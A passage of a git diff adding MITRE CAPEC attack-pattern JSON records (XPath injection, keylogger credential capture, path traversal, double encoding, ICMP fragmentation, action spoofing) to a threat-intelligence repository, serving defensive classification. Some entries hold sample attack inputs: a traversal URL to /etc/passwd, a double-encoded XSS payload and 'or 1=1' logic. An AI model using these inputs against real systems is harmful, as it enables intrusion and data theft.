", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json new file mode 100644 index 0000000000000000000000000000000000000000..2a500790c8819c4e047ab8fe6058989c785e0125 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json 
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--9405aa45-768b-4851-bae7-56a291874093",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-566",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/566.html"
+ }
+ ],
+ "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c",
+ "modified": "2019-04-04T00:00:00.000Z",
+ "name": "DEPRECATED: Dump Password Hashes",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b.json
new file mode 100644
index 0000000000000000000000000000000000000000..33c2d785e47e1982c44f909e668bfd389bdf98b3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b.json
@@ -0,0 +1,105 @@ +{ + "id": "bundle--3c532f79-478b-41ee-a77a-d7677b30d235", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "external_id": "CAPEC-83", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html" + }, + { + "external_id": "CWE-91", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XPath Injection", + "external_id": "39", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XPath-Injection" + }, + { + "description": "Blind XPath Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_XPath_Injection" + }, + { + "description": "XPATH Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/XPATH_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-611", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" + } + ], + "id": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XPath Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of user-controllable input used to contruct XPath queries.

  2. Techniques
    Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.
    Use a browser to manually explore the website and analyze how the application processes inputs.
  3. Determine the tructure of queries: Using manual or automated means, test inputs found for XPath weaknesses.

  4. Techniques
    Use an automated tool automatically probe the inputs for XPath weaknesses.
    Manually probe the inputs using characters such as single quote (') that can cause XPath-releated errors, thus indicating an XPath weakness.

Exploit

  1. Inject content into XPath query: Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.

  2. Techniques
    Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker.
    Use a combination of single quote (') and boolean expressions such as \"or 1=1\" to manipulate XPath logic.
    Use XPath functions in the malicious content such as \"string-length\", \"substring\", or \"count\" to gain information about the XML document structure being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json new file mode 100644 index 0000000000000000000000000000000000000000..0b84396b9953b7ca2f4822b9d60d692113e2dcbc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json 
@@ -0,0 +1,56 @@ +{ + "id": "bundle--97f0341d-d96b-460b-adee-07e902219033", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

  2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger
  3. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  4. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

  5. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json new file mode 100644 index 0000000000000000000000000000000000000000..dfca66f99845c18fe9e72dfee29590c09dbfc766 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json 
@@ -0,0 +1,110 @@ +{ + "id": "bundle--a3a0c6ce-f66a-49b5-b116-6c2082e62b40", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. 
This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json new file mode 100644 index 0000000000000000000000000000000000000000..619fca557a6c632faeefaa66e8bc1e1f80861e27 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json 
@@ -0,0 +1,99 @@ +{ + "id": "bundle--c7f3cdbe-8aea-4b30-a8f2-d65379407f8c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) 
by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS 
Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

  2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json new file mode 100644 index 0000000000000000000000000000000000000000..6afa6b719dd5f649a90a1d2d183b1fcda9b1c157 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json 
@@ -0,0 +1,29 @@ +{ + "id": "bundle--f3c11bde-9343-44be-9c74-e94a7c46e3c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that are children of CAPEC-312.", + "external_references": [ + { + "external_id": "CAPEC-315", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/315.html" + } + ], + "id": "attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: TCP/IP Fingerprinting Probes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json new file mode 100644 index 0000000000000000000000000000000000000000..4ef7d59f4e14d9d0cf00e4208479cad4badb3724 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json 
@@ -0,0 +1,55 @@ +{ + "id": "bundle--4309b9b6-ee3a-464b-ae26-2ece2c52e207", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send 
arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json new file mode 100644 index 0000000000000000000000000000000000000000..6bf2a2df4494c74fd46d405ca90a2a70b207f31b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json 
@@ -0,0 +1,61 @@ +{ + "id": "bundle--4670c8ed-cd53-43cc-9486-83c4b0e8c3ce", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.", + "external_references": [ + { + "external_id": "CAPEC-173", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Action Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + 
"x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4" + ], + "x_capec_prerequisites": [ + "The adversary must convince the victim into performing the decoy action.", + "The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json new file mode 100644 index 0000000000000000000000000000000000000000..757c148fa4319e1b338c37a24eb2556755676d8a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json 
